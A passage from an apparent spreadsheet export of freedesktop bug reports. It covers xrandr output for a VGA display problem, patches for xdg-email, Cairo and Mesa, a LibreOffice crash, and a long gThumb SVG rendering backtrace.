        h: width   800 start  856 end  976 total 1040 skew    0 clock   48.1KHz
        v: height  600 start  637 end  643 total  666           clock   72.2Hz 
  800x600 (0x10c)   49.5MHz +HSync +VSync                                      
        h: width   800 start  816 end  896 total 1056 skew    0 clock   46.9KHz
        v: height  600 start  601 end  604 total  625           clock   75.0Hz 
  800x600 (0x41)   40.0MHz +HSync +VSync                                       
        h: width   800 start  840 end  968 total 1056 skew    0 clock   37.9KHz
        v: height  600 start  601 end  605 total  628           clock   60.3Hz 
  800x600 (0x10d)   36.0MHz +HSync +VSync                                      
        h: width   800 start  824 end  896 total 1024 skew    0 clock   35.2KHz
        v: height  600 start  601 end  603 total  625           clock   56.2Hz 
  640x480 (0x10e)   31.5MHz -HSync -VSync                                      
        h: width   640 start  664 end  704 total  832 skew    0 clock   37.9KHz
        v: height  480 start  489 end  491 total  520           clock   72.8Hz 
  640x480 (0x10f)   31.5MHz -HSync -VSync                                      
        h: width   640 start  656 end  720 total  840 skew    0 clock   37.5KHz
        v: height  480 start  481 end  484 total  500           clock   75.0Hz 
  640x480 (0x110)   25.2MHz -HSync -VSync                                      
        h: width   640 start  656 end  752 total  800 skew    0 clock   31.5KHz
        v: height  480 start  490 end  492 total  525           clock   60.0Hz 
  720x400 (0x111)   28.3MHz -HSync +VSync                                      
        h: width   720 start  738 end  846 total  900 skew    0 clock   31.5KHz
        v: height  400 start  412 end  414 total  449           clock   70.1Hz 
LVDS1 connected 1024x768+0+0 (0x40) normal (normal left inverted right x axis y axis) 0mm x 0mm
        Identifier: 0x3c                                                                       
        Timestamp:  245268                                                                     
        Subpixel:   unknown                                                                    
        Clones:                                                                                
        CRTC:       1
        CRTCs:      1
        Transform:  1.000000 0.000000 0.000000
                    0.000000 1.000000 0.000000
                    0.000000 0.000000 1.000000
                   filter:
  1280x800 (0x3e)   68.9MHz +preferred
        h: width  1280 start 1296 end 1344 total 1410 skew    0 clock   48.9KHz
        v: height  800 start  801 end  804 total  815           clock   59.9Hz
  1360x768 (0x3f)   84.8MHz -HSync +VSync
        h: width  1360 start 1432 end 1568 total 1776 skew    0 clock   47.7KHz
        v: height  768 start  771 end  781 total  798           clock   59.8Hz
  1024x768 (0x40)   65.0MHz -HSync -VSync *current
        h: width  1024 start 1048 end 1184 total 1344 skew    0 clock   48.4KHz
        v: height  768 start  771 end  777 total  806           clock   60.0Hz
  800x600 (0x41)   40.0MHz +HSync +VSync
        h: width   800 start  840 end  968 total 1056 skew    0 clock   37.9KHz
        v: height  600 start  601 end  605 total  628           clock   60.3Hz
  640x480 (0x42)   25.2MHz -HSync -VSync
        h: width   640 start  656 end  752 total  800 skew    0 clock   31.5KHz
        v: height  480 start  490 end  492 total  525           clock   59.9Hz
TV1 disconnected 1024x768+0+0 (0x43) normal (normal left inverted right x axis y axis) 0mm x 0mm
        Identifier: 0x3d
        Timestamp:  245268
        Subpixel:   unknown
        Clones:
        CRTC:       0
        CRTCs:      0 1
        Transform:  1.000000 0.000000 0.000000
                    0.000000 1.000000 0.000000
                    0.000000 0.000000 1.000000
                   filter:
  1024x768 (0x43)   26.9MHz
        h: width  1024 start 1025 end 1088 total 1120 skew    0 clock   24.0KHz
        v: height  768 start  769 end  800 total  801           clock   30.0Hz
$xrandr --output VGA1 --mode 1024x768
xrandr: cannot find crtc for output VGA1
I have also tried with current git master of xserver mesa xf86-video-intel. No message appears and no signal on the VGA monitor.
thanks for your attention</t>
  </si>
  <si>
    <t>stavallo</t>
  </si>
  <si>
    <t>PORTLAND-91997</t>
  </si>
  <si>
    <t>xdg-email: Icedove is not detected by Thunderbird handling code</t>
  </si>
  <si>
    <t>Created attachment 118254
xdg-email-detect-icedove.patch
xdg-email detects if the preferred MUA is Thunderbird and uses run_thunderbird to launch it. However Thunderbird is called Icedove in Debian (due to trademark issues). The attached patch makes xdg-email also detect Icedove.</t>
  </si>
  <si>
    <t>LIBREOFFICE-79371</t>
  </si>
  <si>
    <t>CRASH: press delete key in contour dialog</t>
  </si>
  <si>
    <t>Created attachment 100034
sample document so you can start from step 4
1. Open Writer
2. Insert An Image
3. right-click on image Wrap &gt; Contour
4. right-click on image Wrap &gt; Edit Contour
5. select the Contour
6. Press Delete
7. LibO Crashes
Tested in Linux Mint on LibO 4.1.6 and 4.2.4. Its fine in 4.0 and 4.3.
If you reopen LibO after the crash you get the crash recovery click 'cancel' and then 'yes'. Then click on Writer and it will jump back into the contour dialog.</t>
  </si>
  <si>
    <t>CAIRO-73441</t>
  </si>
  <si>
    <t>Cairo generates PDFs with wrong font names</t>
  </si>
  <si>
    <t>Created attachment 91766
Generate PDFs with correct font names
Cairo exports font names in their original form. But these can be wrong they can sometimes contain white space characters or PDF/PostScript delimiter characters. Such fonts are not common but they appear.
This can cause a problem when you are printing such file in evince. The printing fails during processing of an intermediate PDF because there are delimiter characters where they shouldn't be.
Attached patch escapes PostScript names of fonts (ps_name variable) right after these are loaded. It was already case for TrueType and OpenType fonts but not for pure CFF fonts. Type1 fonts were just shortened to the last correct character.
Marek</t>
  </si>
  <si>
    <t>MESA-45558</t>
  </si>
  <si>
    <t>cannot render on a drawable of size equal the max framebuffer size</t>
  </si>
  <si>
    <t>Created attachment 56550
do not drift one pixel above what we want - x2 y2 are exclusive max
The xorg drawable sizes are exclusive as I have learned on xorg-devel irc channel by MrCooper.
This means that width = x2 - x1  x2 behing exclusive and thus in the places the code does DrawBuffer-&gt;Width + x1 to get the right coordinate when we get a coordinate one pixel above what we want (ie we send x2 which is exclusive).
This patch fixes a few places were the gen2 865g are affected by this bug. That is gnome-shell renders badly due to cogl using atlas a power of two of the resolution (which is good but this leads to 2048 which is the framebuffer max size on gen2).
I will also attach the testcase I used which is dumb but reproduce the same issue as gnome-shell /cogl. Ie a drawable attached to the context as read and draw buffer the size equal to framebuffer max size  ie 2048 on 865g gen2.</t>
  </si>
  <si>
    <t>CAIRO-10598</t>
  </si>
  <si>
    <t>crash when viewing svg file</t>
  </si>
  <si>
    <t>gThumb crashes when viewing an svg file due to a crash in cairo svg rendering.
The original bug reports are here:
http://bugzilla.gnome.org/show_bug.cgi?id=424199 (has svg file)
http://bugzilla.gnome.org/show_bug.cgi?id=428208 (best stacktrace)
The backtrace:
Distribution: Fedora Core release 6 (Zod)
Gnome Release: 2.16.3 2007-01-31 (Red Hat Inc)
BugBuddy Version: 2.16.0
System: Linux 2.6.19-1.2911.fc6 #1 SMP Sat Feb 10 15:51:47 EST 2007 i686
X Vendor: The XFree86 Project Inc
X Vendor Release: 40300000
Selinux: No
Accessibility: Disabled
Memory status: size: 133980160 vsize: 0 resident: 133980160 share: 0 rss:
44367872 rss_rlim: 0
CPU usage: start_time: 1176205406 rtime: 0 utime: 260 stime: 0 cutime:233
cstime: 0 timeout: 27 it_real_value: 0 frequency: 0
Backtrace was generated from '/usr/bin/gthumb'
Using host libthread_db library /lib/libthread_db.so.1.
[Thread debugging using libthread_db enabled]
[New Thread -1208346912 (LWP 9727)]
[New Thread -1318589552 (LWP 9745)]
[New Thread -1318061168 (LWP 9744)]
[New Thread -1316156528 (LWP 9743)]
[New Thread -1252689008 (LWP 9735)]
[New Thread -1252160624 (LWP 9734)]
0x00c79402 in __kernel_vsyscall ()
#0  0x00c79402 in __kernel_vsyscall ()
#1  0x00da398e in __lll_mutex_lock_wait () from /lib/libpthread.so.0
#2  0x00d9f7fc in _L_mutex_lock_85 () from /lib/libpthread.so.0
#3  0x00d9f33d in __pthread_mutex_lock (mutex=0x9a19778) at
pthread_mutex_lock.c:81
#4  0x00e30cef in check_thread (data=0x9a19a50) at image-loader.c:731
#5  0x037fca16 in g_timeout_dispatch (source=0x9b1c500 callback=0
user_data=0x9a19a50) at gmain.c:3422
#6  0x037fc442 in IA__g_main_context_dispatch (context=0x991d660) at
gmain.c:2045
#7  0x037ff41f in g_main_context_iterate (context=0x991d660 block=1
dispatch=1 self=0x9900f50)
    at gmain.c:2677
#8  0x037ff7c9 in IA__g_main_loop_run (loop=0x9c4b240) at gmain.c:2881
#9  0x0212d4b4 in IA__gtk_main () at gtkmain.c:1148
#10 0x080a65b5 in main (argc=) at main.c:834
Thread 6 (Thread -1252160624 (LWP 9734)):
#0  0x00c79402 in __kernel_vsyscall ()
No symbol table info available.
#1  0x00da4cbb in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#2  0x02459cf6 in libgnomeui_segv_handle (signum=6) at gnome-ui-init.c:870
        estatus = 29156194
        sa = {__sigaction_handler = {sa_handler = 0 sa_sigaction = 0} sa_mask
= {__val = {3042796064 
      0 0 42233907 29156194 42239212 29321448 42242476 29487233
42243675 29653524 3042795880 
      79228173 1869 0 0 0 0 42211898 28662052 42221258 28826218
42228603 28990940 42233907 
      29156194 0 0 0 0 3042796328 2491416576}} sa_flags = 1074222420
sa_restorer = 0x2847033}
        pid = 0
        in_segv = 1
#3  
No symbol table info available.
#4  0x00c79402 in __kernel_vsyscall ()
No symbol table info available.
#5  0x00151d40 in *__GI_raise (sig=6) at
../nptl/sysdeps/unix/sysv/linux/raise.c:64
        resultvar = 
        pid = 2498548
        selftid = 9734
#6  0x00153591 in *__GI_abort () at abort.c:88
        act = {__sigaction_handler = {sa_handler = 0x263120  
    sa_sigaction = 0x263120 } sa_mask = {__val = {162726616
2498548 2502944 163952328 
      162726608 1642190 2502944 108 2498548 108 163952328 3042797000
1598317 162726616 
      162726616 107 163952328 0 107 4222451712 162726616 162726717
162726616 162726616 
      162726723 1632417 162726616 162726916 0 0 0 0}} sa_flags = 0
sa_restorer = 0x73256020}
        sigs = {__val = {32 0 }}
#7  0x0014b38b in *__GI___assert_fail (assertion=0x4bd1070 i &lt;
pen-&gt;num_vertices 
    file=0x4bd1064 cairo-pen.c line=323 function=0x4bd10a0
_cairo_pen_find_active_cw_vertex_index)
    at assert.c:78
        buf = 0x9c5b6c8 
        errstr = Unexpected error.\n
#8  0x04b8c16f in _cairo_pen_find_active_cw_vertex_index (pen=0xb55d67a4
slope=0xb55d66d0 
    active=0xb55d66d8) at cairo-pen.c:323
        i = 4
        __PRETTY_FUNCTION__ = _cairo_pen_find_active_cw_vertex_index
#9  0x04b8a9f4 in _cairo_stroker_add_cap (stroker=0xb55d678c f=0xb55d6700) at
cairo-path-stroke.c:385
        i = 
        stop = 
        slope = {dx = 20 dy = -10642879}
        tri = {{x = 0 y = 0} {x = 0 y = 0} {x = 0 y = 0}}
        pen = (cairo_pen_t *) 0xb55d67a4
        start = 
        status = 
#10 0x04b8ac65 in _cairo_stroker_add_leading_cap (stroker=0x0 face=&lt;value
optimized out&gt;)
    at cairo-path-stroke.c:456
        reversed = {ccw = {x = 42244184 y = 29794954} point = {x = 42244184
y = 29794954} cw = {
    x = 42244184 y = 29794954} dev_vector = {dx = 20 dy = -10642879}
usr_vector = {
    x = 1.9109012527931071e-06 y = -0.99999999999817424}}
#11 0x04b8ac95 in _cairo_stroker_add_caps (stroker=0xb55d678c) at
cairo-path-stroke.c:488
        status = 
#12 0x04b8af1a in _cairo_path_fixed_stroke_to_traps (path=0x9c67a68
stroke_style=0x9d09758 
    ctm=0x9d097f4 ctm_inverse=0x9d09824 tolerance=0.10000000000000001
traps=0xb55d6884)
    at cairo-path-stroke.c:1005
        status = CAIRO_STATUS_SUCCESS
        stroker = {style = 0x9d09758 ctm = 0x9d097f4 ctm_inverse = 0x9d09824 
  tolerance = 0.10000000000000001 traps = 0xb55d6884 pen = {radius = 0 
    tolerance = 0.10000000000000001 vertices = 0x9b2d460 num_vertices = 4}
current_point = {
    x = 42243675 y = 29653524} first_point = {x = 42244184 y = 29794954}
has_sub_path = 0 
  has_current_face = 1 current_face = {ccw = {x = 42243675 y = 29653524}
point = {x = 42243675 
      y = 29653524} cw = {x = 42243675 y = 29653524} dev_vector = {dx =
76695 dy = 10642593} 
    usr_vector = {x = 0.0073278287515938199 y = 0.99997315110246199}}
has_first_face = 1 
  first_face = {ccw = {x = 42244184 y = 29794954} point = {x = 42244184 y =
29794954} cw = {
      x = 42244184 y = 29794954} dev_vector = {dx = -20 dy = 10642879}
usr_vector = {
      x = -1.9109012527931071e-06 y = 0.99999999999817424}} dashed = 0
dash_index = 0 
  dash_on = -1345029298 dash_remain = 5.2995795623450048e-315}
#13 0x04b84db7 in _cairo_gstate_stroke_extents (gstate=0x9d09748
path=0x9c67a68 x1=0xb55d6978 
    y1=0xb55d6980 x2=0xb55d6988 y2=0xb55d6990) at cairo-gstate.c:1056
        status = 79146852
        traps = {traps = 0x0 num_traps = 0 traps_size = 0 extents = {p1 = {x
= 2147418112 
      y = 2147418112} p2 = {x = -2147483648 y = -2147483648}}}
        extents = {p1 = {x = 164682544 y = 0} p2 = {x = 1 y = 1}}
#14 0x04b7ffb2 in cairo_stroke_extents (cr=0x9c67a60 x1=0xb55d6978 y1=0x2606
x2=0x6 y2=0xb55d6990)
    at cairo.c:2021
No locals.
#15 0x009c6b14 in rsvg_cairo_render_path (ctx=0x9b1d768 bpath_def=0x9b302c0)
at rsvg-cairo-draw.c:546
        sb = {x = 71.980259794366702 y = -1.3969901333541941 w =
575.82484947592877 
  h = 575.82195093494511 virgin = 1 affine = {1.005657 0 0 1.022627
-6.8746500000000026 
    161.63940000000002}}
        state = (RsvgState *) 0x9d29868
        cr = (cairo_t *) 0x9c67a60
        bpath = 
        i = 6
        need_tmpbuf = 0
        bbox = {x = 71.980259794366702 y = -1.3969901333541992 w =
575.82484947592877 
  h = 575.82195093494511 virgin = 0 affine = {1.005657 0 0 1.022627
-6.8746500000000026 
    161.63940000000002}}
#16 0x009c19ce in rsvg_render_path (ctx=0x9b1d768 
    d=0x9d16e48 M 647.80511286.51260 A 287.91339287.91339 0 1 1
647.79738284.40230)
    at rsvg-base.c:1639
        bpath_def = (RsvgBpathDef *) 0x9b302c0
#17 0x009b747b in rsvg_node_path_draw (self=0x9d16c30 ctx=0x9b1d768
dominate=0) at rsvg-shapes.c:61
No locals.
#18 0x009b9fee in rsvg_node_draw (self=0x6 ctx=0x9b1d768 dominate=0) at
rsvg-structure.c:54
        stacksave = (GSList *) 0x0
#19 0x009ba2aa in _rsvg_node_draw_children (self=0x9d0a618 ctx=0x9b1d768
dominate=0)
    at rsvg-structure.c:73
        i = 2
#20 0x009b9fee in rsvg_node_draw (self=0x6 ctx=0x9b1d768 dominate=0) at
rsvg-structure.c:54
        stacksave = (GSList *) 0x0
#21 0x009ba2aa in _rsvg_node_draw_children (self=0x9c67cf0 ctx=0x9b1d768
dominate=0)
    at rsvg-structure.c:73
        i = 2
#22 0x009b9fee in rsvg_node_draw (self=0x6 ctx=0x9b1d768 dominate=0) at
rsvg-structure.c:54
        stacksave = (GSList *) 0x0
#23 0x009baaff in rsvg_node_svg_draw (self=0x9b20fa0 ctx=0x9b1d768
dominate=0) at rsvg-structure.c:346
        state = 
        affine = {1 0 0 1 0 0}
        affine_old = {1 0 0 1 0 0}
        affine_new = {1 0 0 1 0 0}
        i = 5
        nx = 0
        ny = 0
        nw = 744.09447999999998
        nh = 1052.3622
#24 0x009b9fee in rsvg_node_draw (self=0x6 ctx=0x9b1d768 dominate=0) at
rsvg-structure.c:54
        stacksave = (GSList *) 0x0
#25 0x009c72d7 in rsvg_handle_render_cairo_sub (handle=0x9c53558 cr=0x9c67a60
id=0x0)
    at rsvg-cairo-render.c:161
        drawsub = (RsvgNode *) 0x9d29020
        __PRETTY_FUNCTION__ = rsvg_handle_render_cairo_sub
#26 0x009c777e in rsvg_handle_get_pixbuf_sub (handle=0x9c53558 id=0x0) at
rsvg.c:101
        dimensions = {width = 744 height = 1052 em = 744 ex = 1052}
        output = 
        surface = (cairo_surface_t *) 0x9c67978
        cr = (cairo_t *) 0x9c67a60
        rowstride = 2976
        __PRETTY_FUNCTION__ = rsvg_handle_get_pixbuf_sub
#27 0x009c7855 in rsvg_handle_get_pixbuf (handle=0x9c53558) at rsvg.c:135
No locals.
#28 0x00527bc7 in gdk_pixbuf__svg_image_stop_load (data=0x9c5cca0
error=0xb55d8368) at io-svg.c:154
        pixbuf = 
#29 0x03d8611d in _gdk_pixbuf_generic_image_load (module=0x9939700
f=0xb1705680 error=0xb55d8368)
    at gdk-pixbuf-io.c:810
        buffer =
e-width:0.00000000stroke-linecap:roundstroke-linejoin:roundstroke-miterlimit:4.0000000stroke-dashoffset:1.8218375stroke-opacity:1.0000000\
transform=\translate(24.42309273.6212)\/&gt;\n      &lt;path d...
        length = 
        pixbuf = (GdkPixbuf *) 0x0
        animation = 
        context = (gpointer) 0x9c5cca0
        locked = 1
#30 0x03d87114 in IA__gdk_pixbuf_new_from_file (
    filename=0xb1706950
/fileserver/mjcfiles/eraseme/svg/blue_eye_kilian_valkhof_.svg 
    error=0xb55d8368) at gdk-pixbuf-io.c:902
        pixbuf = 
        f = (FILE *) 0xb1705680
        buffer = &lt;?xml version=\1.0\ encoding=\UTF-8\
standalone=\no\?&gt;\n&lt;!-- Created with Inkscape (http://www.inkscape.org/)
--&gt;&lt;svg height=\1052.3622\ id=\svg1\ version=\1.0\ width=\744.09448\
x=\0.00000000\ xmlns=\...
        image_module = (GdkPixbufModule *) 0x9939700
        display_name = (
    gchar *) 0xb17067d8
/fileserver/mjcfiles/eraseme/svg/blue_eye_kilian_valkhof_.svg
        __PRETTY_FUNCTION__ = IA__gdk_pixbuf_new_from_file
#31 0x00e12b62 in gth_pixbuf_new_from_uri (
    uri=0xb1706a10
/fileserver/mjcfiles/eraseme/svg/blue_eye_kilian_valkhof_.svg
error=0xb55d8368 
    requested_width_if_used=128 requested_height_if_used=128
mime_type=0x9b7f5a0 image/svg+xml)
    at file-utils.c:2763
        pixbuf = (GdkPixbuf *) 0xb1706a10
        local_file = 0xb1706950
/fileserver/mjcfiles/eraseme/svg/blue_eye_kilian_valkhof_.svg
#32 0x00e146a4 in gth_pixbuf_animation_new_from_uri (
    filename=0xb1702218
file:///fileserver/mjcfiles/eraseme/svg/blue_eye_kilian_valkhof_.svg 
    error=0xb55d8368 requested_width_if_used=128
requested_height_if_used=128 factory=0x9af9f80 
    mime_type=0x9b7f5a0 image/svg+xml) at file-utils.c:2832
        local_uri = 0xb1706a10
/fileserver/mjcfiles/eraseme/svg/blue_eye_kilian_valkhof_.svg
        animation = 
        pixbuf = 
        local_file = 0xb1705060
/fileserver/mjcfiles/eraseme/svg/blue_eye_kilian_valkhof_.svg
#33 0x00e44ed6 in thumb_loader (
    path=0xb1702218
file:///fileserver/mjcfiles/eraseme/svg/blue_eye_kilian_valkhof_.svg 
    mime_type=0x9b7f5a0 image/svg+xml error=0xb55d8368 data=0x9af9eb0) at
thumb-loader.c:239
No locals.
#34 0x00e311f1 in load_image_thread (thread_data=0x9b020b0) at
image-loader.c:639
        path = 0xb1702218
file:///fileserver/mjcfiles/eraseme/svg/blue_eye_kilian_valkhof_.svg
        exit_thread = 
        priv = (ImageLoaderPrivateData *) 0x9b03168
        animation = (GdkPixbufAnimation *) 0x0
        error = (GError *) 0x0
#35 0x0381a29f in g_thread_create_proxy (data=0x9afda48) at gthread.c:591
        __PRETTY_FUNCTION__ = g_thread_create_proxy
#36 0x00d9d3db in start_thread (arg=0xb55d8b90) at pthread_create.c:296
        __res = 
        __ignore1 = 
        __ignore2 = 
        pd = (struct pthread *) 0xb55d8b90
        now = 
        unwind_buf = {cancel_jmp_buf = {{jmp_buf = {14335988 0 4001536
-1252162408 1293221335 
        -124736065} mask_was_saved = 0}} priv = {pad = {0x0 0x0 0x0 0x0}
data = {prev = 0x0 
      cleanup = 0x0 canceltype = 0}}}
        not_first_call = 0
        robust = 
#37 0x001f626e in clone () from /lib/libc.so.6
        fstab_state = {fs_fp = 0x0 fs_buffer = 0x0 fs_mntres = {mnt_fsname =
0x0 mnt_dir = 0x0 
    mnt_type = 0x0 mnt_opts = 0x0 mnt_freq = 0 mnt_passno = 0} fs_ret =
{fs_spec = 0x0 
    fs_file = 0x0 fs_vfstype = 0x0 fs_mntops = 0x0 fs_type = 0x0 fs_freq =
0 fs_passno = 0}}
        __elf_set___libc_subfreeres_element_fstab_free__ = (const void *)
0x234160
Thread 5 (Thread -1252689008 (LWP 9735)):
#0  0x00c79402 in __kernel_vsyscall ()
No symbol table info available.
#1  0x00da11a6 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0
No symbol table info available.
#2  0x00e31179 in load_image_thread (thread_data=0x99f5b00) at
image-loader.c:619
        path = 0x80c2a6c \001
        exit_thread = 
        priv = (ImageLoaderPrivateData *) 0x9b32400
        animation = (GdkPixbufAnimation *) 0xda07c0
        error = (GError *) 0x0
#3  0x0381a29f in g_thread_create_proxy (data=0x9b32520) at gthread.c:591
        __PRETTY_FUNCTION__ = g_thread_create_proxy
#4  0x00d9d3db in start_thread (arg=0xb5557b90) at pthread_create.c:296
        __res = 
        __ignore1 = 
        __ignore2 = 
        pd = (struct pthread *) 0xb5557b90
        now = 
        unwind_buf = {cancel_jmp_buf = {{jmp_buf = {14335988 0 4001536
-1252690792 1293684183 
        -124736065} mask_was_saved = 0}} priv = {pad = {0x0 0x0 0x0 0x0}
data = {prev = 0x0 
      cleanup = 0x0 canceltype = 0}}}
        not_first_call = 0
        robust = 
#5  0x001f626e in clone () from /lib/libc.so.6
        fstab_state = {fs_fp = 0x0 fs_buffer = 0x0 fs_mntres = {mnt_fsname =
0x0 mnt_dir = 0x0 
    mnt_type = 0x0 mnt_opts = 0x0 mnt_freq = 0 mnt_passno = 0} fs_ret =
{fs_spec = 0x0 
    fs_file = 0x0 fs_vfstype = 0x0 fs_mntops = 0x0 fs_type = 0x0 fs_freq =
0 fs_passno = 0}}
        __elf_set___libc_subfreeres_element_fstab_free__ = (const void *)
0x234160
Thread 4 (Thread -1316156528 (LWP 9743)):
#0  0x00c79402 in __kernel_vsyscall ()
No symbol table info available.
#1  0x00da398e in __lll_mutex_lock_wait () from /lib/libpthread.so.0
No symbol table info available.
#2  0x00d9f7fc in _L_mutex_lock_85 () from /lib/libpthread.so.0
No symbol table info available.
#3  0x00d9f33d in __pthread_mutex_lock (mutex=0xe65560) at
pthread_mutex_lock.c:81
        ignore1 = 
        ignore2 = 
        oldval = 
        retval = 
#4  0x00e31361 in load_image_thread (thread_data=0x9a19a50) at
image-loader.c:634
        path = 0x9c4fb10
file:///fileserver/mjcfiles/eraseme/svg/blue_eye_kilian_valkhof_.svg
        exit_thread = 
        priv = (ImageLoaderPrivateData *) 0x9bb30e0
        animation = 
        error = (GError *) 0x0
#5  0x0381a29f in g_thread_create_proxy (data=0x9bb31e0) at gthread.c:591
        __PRETTY_FUNCTION__ = g_thread_create_proxy
#6  0x00d9d3db in start_thread (arg=0xb18d0b90) at pthread_create.c:296
        __res = 
        __ignore1 = 
        __ignore2 = 
        pd = (struct pthread *) 0xb18d0b90
        now = 
        unwind_buf = {cancel_jmp_buf = {{jmp_buf = {14335988 0 4001536
-1316158312 1237614039 
        -124736065} mask_was_saved = 0}} priv = {pad = {0x0 0x0 0x0 0x0}
data = {prev = 0x0 
      cleanup = 0x0 canceltype = 0}}}
        not_first_call = 0
        robust = 
#7  0x001f626e in clone () from /lib/libc.so.6
        fstab_state = {fs_fp = 0x0 fs_buffer = 0x0 fs_mntres = {mnt_fsname =
0x0 mnt_dir = 0x0 
    mnt_type = 0x0 mnt_opts = 0x0 mnt_freq = 0 mnt_passno = 0} fs_ret =
{fs_spec = 0x0 
    fs_file = 0x0 fs_vfstype = 0x0 fs_mntops = 0x0 fs_type = 0x0 fs_freq =
0 fs_passno = 0}}
        __elf_set___libc_subfreeres_element_fstab_free__ = (const void *)
0x234160
Thread 3 (Thread -1318061168 (LWP 9744)):
#0  0x00c79402 in __kernel_vsyscall ()
No symbol table info available.
#1  0x00da11a6 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0
No symbol table info available.
#2  0x00e31179 in load_image_thread (thread_data=0x9a19a20) at
image-loader.c:619
        path = 0x9c86350 \030Â¹\221\t\003
        exit_thread = 
        priv = (ImageLoaderPrivateData *) 0x9bb8630
        animation = (GdkPixbufAnimation *) 0x9d0ccd0
        error = (GError *) 0x0
#3  0x0381a29f in g_thread_create_proxy (data=0x9a1ae40) at gthread.c:591
        __PRETTY_FUNCTION__ = g_thread_create_proxy
#4  0x00d9d3db in start_thread (arg=0xb16ffb90) at pthread_create.c:296
        __res = 
        __ignore1 = 
        __ignore2 = 
        pd = (struct pthread *) 0xb16ffb90
        now = 
        unwind_buf = {cancel_jmp_buf = {{jmp_buf = {14335988 0 4001536
-1318062952 1227263447 
        -124736065} mask_was_saved = 0}} priv = {pad = {0x0 0x0 0x0 0x0}
data = {prev = 0x0 
      cleanup = 0x0 canceltype = 0}}}
        not_first_call = 0
        robust = 
#5  0x001f626e in clone () from /lib/libc.so.6
        fstab_state = {fs_fp = 0x0 fs_buffer = 0x0 fs_mntres = {mnt_fsname =
0x0 mnt_dir = 0x0 
    mnt_type = 0x0 mnt_opts = 0x0 mnt_freq = 0 mnt_passno = 0} fs_ret =
{fs_spec = 0x0 
    fs_file = 0x0 fs_vfstype = 0x0 fs_mntops = 0x0 fs_type = 0x0 fs_freq =
0 fs_passno = 0}}
        __elf_set___libc_subfreeres_element_fstab_free__ = (const void *)
0x234160
Thread 2 (Thread -1318589552 (LWP 9745)):
#0  0x00c79402 in __kernel_vsyscall ()
No symbol table info available.
#1  0x00da11a6 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0
No symbol table info available.
#2  0x00e31179 in load_image_thread (thread_data=0x9a19810) at
image-loader.c:619
        path = 0x80c2a6c \001
        exit_thread = 
        priv = (ImageLoaderPrivateData *) 0x9bb8e28
        animation = (GdkPixbufAnimation *) 0xda07c0
        error = (GError *) 0x0
#3  0x0381a29f in g_thread_create_proxy (data=0x9bb90a0) at gthread.c:591
        __PRETTY_FUNCTION__ = g_thread_create_proxy
#4  0x00d9d3db in start_thread (arg=0xb167eb90) at pthread_create.c:296
        __res = 
        __ignore1 = 
        __ignore2 = 
        pd = (struct pthread *) 0xb167eb90
        now = 
        unwind_buf = {cancel_jmp_buf = {{jmp_buf = {14335988 0 4001536
-1318591336 1227791831 
        -124736065} mask_was_saved = 0}} priv = {pad = {0x0 0x0 0x0 0x0}
data = {prev = 0x0 
      cleanup = 0x0 canceltype = 0}}}
        not_first_call = 0
        robust = 
#5  0x001f626e in clone () from /lib/libc.so.6
        fstab_state = {fs_fp = 0x0 fs_buffer = 0x0 fs_mntres = {mnt_fsname =
0x0 mnt_dir = 0x0 
    mnt_type = 0x0 mnt_opts = 0x0 mnt_freq = 0 mnt_passno = 0} fs_ret =
{fs_spec = 0x0 
    fs_file = 0x0 fs_vfstype = 0x0 fs_mntops = 0x0 fs_type = 0x0 fs_freq =
0 fs_passno = 0}}
        __elf_set___libc_subfreeres_element_fstab_free__ = (const void *)
0x234160
Thread 1 (Thread -1208346912 (LWP 9727)):
#0  0x00c79402 in __kernel_vsyscall ()
No symbol table info available.
#1  0x00da398e in __lll_mutex_lock_wait () from /lib/libpthread.so.0
No symbol table info available.
#2  0x00d9f7fc in _L_mutex_lock_85 () from /lib/libpthread.so.0
No symbol table info available.
#3  0x00d9f33d in __pthread_mutex_lock (mutex=0x9a19778) at
pthread_mutex_lock.c:81
        ignore1 = 
        ignore2 = 
        oldval = 
        retval = 
#4  0x00e30cef in check_thread (data=0x9a19a50) at image-loader.c:731
        il = 
        done = 
        error = 
        loader_done = 
        priv = (ImageLoaderPrivateData *) 0x9bb30e0
#5  0x037fca16 in g_timeout_dispatch (source=0x9b1c500 callback=0
user_data=0x9a19a50) at gmain.c:3422
No locals.
#6  0x037fc442 in IA__g_main_context_dispatch (context=0x991d660) at
gmain.c:2045
No locals.
#7  0x037ff41f in g_main_context_iterate (context=0x991d660 block=1
dispatch=1 self=0x9900f50)
    at gmain.c:2677
        got_ownership = 
        max_priority = 0
        timeout = 0
        some_ready = 1
        nfds = 
        allocated_nfds = 
        fds = (GPollFD *) 0x9c5a1a0
        __PRETTY_FUNCTION__ = g_main_context_iterate
#8  0x037ff7c9 in IA__g_main_loop_run (loop=0x9c4b240) at gmain.c:2881
        got_ownership = 14283488
        self = (GThread *) 0x9900f50
        __PRETTY_FUNCTION__ = IA__g_main_loop_run
#9  0x0212d4b4 in IA__gtk_main () at gtkmain.c:1148
        tmp_list = (GList *) 0x0
        functions = (GList *) 0x0
        init = (GtkInitFunction *) 0xbf832054
        loop = (GMainLoop *) 0x9c4b240
#10 0x080a65b5 in main (argc=) at main.c:834
No locals.
#0  0x00c79402 in __kernel_vsyscall ()</t>
  </si>
  <si>
    <t>mjc</t>
  </si>
  <si>
    <t>TELEPATHY-27714</t>
  </si>
  <si>
    <t>tp_g_signal_connect_object: Support G_CONNECT_AFTER flag.</t>
  </si>
  <si>
    <t>DRI-99272</t>
  </si>
  <si>
    <t>[DP][IGT]Displayport hotplug detection races with nonblocking modeset.</t>
  </si>
  <si>
    <t>Created attachment 128751
dmesg warning indicating the race
With nonblocking modeset enabled in i915 there's a testcase failure in kms_atomic_transition and kms_cursor_legacy that shows that nonblocking modeset can race against hotplug.
Relevant testcases:
kms_atomic_transition.1x-modeset-transitions-nonblocking
kms_cursor_legacy.nonblocking-modeset-vs-cursor-atomic
kms_cursor_legacy.long-nonblocking-modeset-vs-cursor-atomic (same but more iterations)</t>
  </si>
  <si>
    <t>TELEPATHY-29656</t>
  </si>
  <si>
    <t>Call: Add support for RTP General header extensions signalling</t>
  </si>
  <si>
    <t>RFC 5285 defines A General Mechanism for RTP Header Extensions this includes a mecanism to negotiate a ID to type mapping. This needs to be signalled down and back up (as they are subject to SDP Offer/Answer negotiation).
So we should probably add it to the CodecOffer..
For each possibility the relevant fields are:
ID (a uint) direction (sendrecv recvonly sendonly inactive) URI</t>
  </si>
